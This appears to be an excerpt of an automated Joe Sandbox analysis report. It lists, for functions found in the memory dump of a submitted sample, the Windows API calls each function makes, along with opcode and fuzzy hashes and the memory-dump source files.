                                                        • Opcode ID: 682b2accdb1da8e5dcbaa81f097324ad20aefc927c58b383088a2a013e4b1cb4
                                                        • Instruction ID: b7f2fd5648e7d46c508cfa520d904c671ee046d1892d51c8dc64b87f55ce32e1
                                                        • Opcode Fuzzy Hash: 682b2accdb1da8e5dcbaa81f097324ad20aefc927c58b383088a2a013e4b1cb4
                                                        • Instruction Fuzzy Hash: 22F054F1941308BEF2105765AC06FB77B7DDB09394F018422BA04E5192D7BE9E0047A9
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 0072C6C0
                                                        • GetWindowRect.USER32(?,?), ref: 0072C701
                                                        • ScreenToClient.USER32(?,?), ref: 0072C729
                                                        • GetClientRect.USER32(?,?), ref: 0072C856
                                                        • GetWindowRect.USER32(?,?), ref: 0072C86F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$Screen
                                                        • String ID:
                                                        • API String ID: 1296646539-0
                                                        • Opcode ID: af17463a9ddc4e45a0e45f43a551d381f380e5af99b5666d3a8dfd0d4f17ac06
                                                        • Instruction ID: bfc46062e916ce5cb5fa6fa3bbcd2c187e6e5c215ee3149bec41ddc99fc422ff
                                                        • Opcode Fuzzy Hash: af17463a9ddc4e45a0e45f43a551d381f380e5af99b5666d3a8dfd0d4f17ac06
                                                        • Instruction Fuzzy Hash: 29B15A79900249DBDF11CFA8C9807EDB7B1FF18350F14912AED59EB255EB38AA40CB64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 8b8bd9b5be6ffa6ab735417ff86383e87c8f19c6858aa891cc26bb6e74eaaee2
                                                        • Instruction ID: 218571e50e0ee772805fcdea263614af862484fff223d57fecdf5aadc5277c28
                                                        • Opcode Fuzzy Hash: 8b8bd9b5be6ffa6ab735417ff86383e87c8f19c6858aa891cc26bb6e74eaaee2
                                                        • Instruction Fuzzy Hash: 0A61AB3050025AEBDB11EF64CC8AEFE37A8AF49704F044455FD1A6B192EB789D49CB91
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00772FA0
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00772FE0
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00773003
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0077302C
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077306F
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077307C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 7a656affff6f2c64070cc3c61fae2b38c6c164f06c888943b6ae9234effe25e1
                                                        • Instruction ID: 41d07f68c9496d492d36db20cc4bc04cd89ab3572fa5b938f0de85c57c4644b7
                                                        • Opcode Fuzzy Hash: 7a656affff6f2c64070cc3c61fae2b38c6c164f06c888943b6ae9234effe25e1
                                                        • Instruction Fuzzy Hash: 2A517A31108200EFCB14EF68C889EAAB7F9FF88354F04891DF555872A1DB79EA45CB52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$_wcscat
                                                        • String ID:
                                                        • API String ID: 2037614760-0
                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                        • Instruction ID: 01ee857f9022e84baf5f24b294de66f04a43365cc9033147b686839d3f5f31a4
                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                        • Instruction Fuzzy Hash: 7251E470904135EECB31AF98E4559BDB3B5EF08710F90804AF541AB292DBBC5F82D7A0
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00752AF6
                                                        • VariantClear.OLEAUT32(00000013), ref: 00752B68
                                                        • VariantClear.OLEAUT32(00000000), ref: 00752BC3
                                                        • _memmove.LIBCMT ref: 00752BED
                                                        • VariantClear.OLEAUT32(?), ref: 00752C3A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00752C68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 460d8ceca87a47656e955c81685511b6da0ef0e45e4ac2967f7d4b1c5b992a6a
                                                        • Instruction ID: c5e317bee3a9cdff74dfbff73abb4ed8aedf8ed87d6d4a6b6114635ad12f055e
                                                        • Opcode Fuzzy Hash: 460d8ceca87a47656e955c81685511b6da0ef0e45e4ac2967f7d4b1c5b992a6a
                                                        • Instruction Fuzzy Hash: 29517AB5A00209EFCB24CF58C884AAAB7B8FF4D314B158559ED49DB311E334E942CFA0
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 0077833D
                                                        • GetMenuItemCount.USER32(00000000), ref: 00778374
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0077839C
                                                        • GetMenuItemID.USER32(?,?), ref: 0077840B
                                                        • GetSubMenu.USER32(?,?), ref: 00778419
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0077846A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 96a486020ae881799d7e757e2643e07ac26106f574dfc19d02cd8463d978787e
                                                        • Instruction ID: fccae1fe3c208e53d5fc6a1eba485db32403d344b048ea0f8a64ef1412b7fcce
                                                        • Opcode Fuzzy Hash: 96a486020ae881799d7e757e2643e07ac26106f574dfc19d02cd8463d978787e
                                                        • Instruction Fuzzy Hash: 2751BF31A00215EFCF50EF68C849AEEB7B4EF48750F148459E819BB351CB78AE428B95
                                                        APIs
                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00769409
                                                        • WSAGetLastError.WS2_32(00000000), ref: 00769416
                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0076943A
                                                        • _strlen.LIBCMT ref: 00769484
                                                        • _memmove.LIBCMT ref: 007694CA
                                                        • WSAGetLastError.WS2_32(00000000), ref: 007694F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                        • String ID:
                                                        • API String ID: 2795762555-0
                                                        • Opcode ID: 561e017763958231676b2d5d3c3e6a87e006064eb761730c74537abd9d814d8a
                                                        • Instruction ID: 376bf98f6ce9464b00288bd4cc75a4298cd452c3b74f77d2ad12a40d7c1623da
                                                        • Opcode Fuzzy Hash: 561e017763958231676b2d5d3c3e6a87e006064eb761730c74537abd9d814d8a
                                                        • Instruction Fuzzy Hash: D2414275500104EBCB14EBA8C999AEEB7BDEF48310F108159FA16972D1DF38DE45CB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 0075552E
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00755579
                                                        • IsMenu.USER32(00000000), ref: 00755599
                                                        • CreatePopupMenu.USER32 ref: 007555CD
                                                        • GetMenuItemCount.USER32(000000FF), ref: 0075562B
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0075565C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 240bdb7243f0da3a1b6ce7bfff2bed890cdffc12219e7c7c458e13b8c2c7e51e
                                                        • Instruction ID: c202ae2ab13cfb7db514c5b1bffac206008e3a8e0db5ee0d423dd6bcee7cacc9
                                                        • Opcode Fuzzy Hash: 240bdb7243f0da3a1b6ce7bfff2bed890cdffc12219e7c7c458e13b8c2c7e51e
                                                        • Instruction Fuzzy Hash: 3251C170600A85DFDF20CF68C8A8BEDBBF5EF0571AF504119E8159B290E3F89949CB51
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0072B1C1
                                                        • GetWindowRect.USER32(?,?), ref: 0072B225
                                                        • ScreenToClient.USER32(?,?), ref: 0072B242
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0072B253
                                                        • EndPaint.USER32(?,?), ref: 0072B29D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: f76f1747a8b5edef3b950390589840363f227aeee62f21155e8c9ff4e4aa1dd8
                                                        • Instruction ID: 0701602e82afd9f3f7d851568c2e7a4c989ccf1bb1c8b53eec03c1409700b3bd
                                                        • Opcode Fuzzy Hash: f76f1747a8b5edef3b950390589840363f227aeee62f21155e8c9ff4e4aa1dd8
                                                        • Instruction Fuzzy Hash: 35418D71104310EFC721DF24EC88BAA7BF8FB4A360F14466AFA95872A1C7399C45DB65
                                                        APIs
                                                        • ShowWindow.USER32(007D1810,00000000,?,?,007D1810,007D1810,?,0078E2D6), ref: 0077E21B
                                                        • EnableWindow.USER32(00000000,00000000), ref: 0077E23F
                                                        • ShowWindow.USER32(007D1810,00000000,?,?,007D1810,007D1810,?,0078E2D6), ref: 0077E29F
                                                        • ShowWindow.USER32(00000000,00000004,?,?,007D1810,007D1810,?,0078E2D6), ref: 0077E2B1
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0077E2D5
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0077E2F8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 34ceaf08a88794aacae3b9d6506f512d708f890dd53a244c28f9e21298a1a212
                                                        • Instruction ID: 4f8d924b1807f4c53bb7104790b4fdcec4ee0b79925aa4a34b3397fa8a2c9289
                                                        • Opcode Fuzzy Hash: 34ceaf08a88794aacae3b9d6506f512d708f890dd53a244c28f9e21298a1a212
                                                        • Instruction Fuzzy Hash: F3415B31600940EFDF26CF18C499B947BA5BB0A344F1881F9EA5C8F2A3C739AC52CB51
                                                        APIs
                                                          • Part of subcall function 0072B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0072B5EB
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B5FA
                                                          • Part of subcall function 0072B58B: BeginPath.GDI32(?), ref: 0072B611
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B63B
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0077E9F2
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0077EA06
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0077EA14
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0077EA24
                                                        • EndPath.GDI32(00000000), ref: 0077EA34
                                                        • StrokePath.GDI32(00000000), ref: 0077EA44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: 918e8a4d4b373aaa14af0c9cb6137ea4b6c1b0c6b12238eb43999061845d6f98
                                                        • Instruction ID: 9acd3d6f591520e8a23f4efb5aa05db0cb4725ba5c730efafcb07178e488eee3
                                                        • Opcode Fuzzy Hash: 918e8a4d4b373aaa14af0c9cb6137ea4b6c1b0c6b12238eb43999061845d6f98
                                                        • Instruction Fuzzy Hash: 4C11097600014DBFDF129F94DC88EEA7FADEB08360F04C012FA094A160D7759D56DBA4
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0074EFB6
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0074EFC7
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0074EFCE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0074EFD6
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0074EFED
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0074EFFF
                                                          • Part of subcall function 0074A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0074A79D,00000000,00000000,?,0074AB73), ref: 0074B2CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                        • String ID:
                                                        • API String ID: 603618608-0
                                                        • Opcode ID: ee2f65b4208a175bb7a04f3e29aff0ac681a5807edd7f01ce01aa6f75e83f660
                                                        • Instruction ID: 07a4c076989959d09babb674b9fbab9b8d6caec8e9ed145b5bdd7a47c4ab68a6
                                                        • Opcode Fuzzy Hash: ee2f65b4208a175bb7a04f3e29aff0ac681a5807edd7f01ce01aa6f75e83f660
                                                        • Instruction Fuzzy Hash: D7016775E40319BFEB109BA6DC49B5EBFB8EB48751F008066FE04AB290D6759D01CF61
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 007387D7
                                                          • Part of subcall function 00731E5A: __initp_misc_winsig.LIBCMT ref: 00731E7E
                                                          • Part of subcall function 00731E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00738BE1
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00738BF5
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00738C08
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00738C1B
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00738C2E
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00738C41
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00738C54
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00738C67
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00738C7A
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00738C8D
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00738CA0
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00738CB3
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00738CC6
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00738CD9
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00738CEC
                                                          • Part of subcall function 00731E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00738CFF
                                                        • __mtinitlocks.LIBCMT ref: 007387DC
                                                          • Part of subcall function 00738AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(007CAC68,00000FA0,?,?,007387E1,00736AFA,007C67D8,00000014), ref: 00738AD1
                                                        • __mtterm.LIBCMT ref: 007387E5
                                                          • Part of subcall function 0073884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 007389CF
                                                          • Part of subcall function 0073884D: _free.LIBCMT ref: 007389D6
                                                          • Part of subcall function 0073884D: RtlDeleteCriticalSection.NTDLL(007CAC68), ref: 007389F8
                                                        • __calloc_crt.LIBCMT ref: 0073880A
                                                        • GetCurrentThreadId.KERNEL32 ref: 00738833
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 2942034483-0
                                                        • Opcode ID: 60ecb3ef63c8823c00339b6249d940bce6b751cddee09d387b8c17d1ee37b81b
                                                        • Instruction ID: 8f18d356e8741f137d1a64368a217d3d02f387296afb124f8ec2ac519f9a222a
                                                        • Opcode Fuzzy Hash: 60ecb3ef63c8823c00339b6249d940bce6b751cddee09d387b8c17d1ee37b81b
                                                        • Instruction Fuzzy Hash: CDF06D731297219EF2A57778BC0BA8A26C08F01774F654A2AF460D60D3FF7D8841415A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
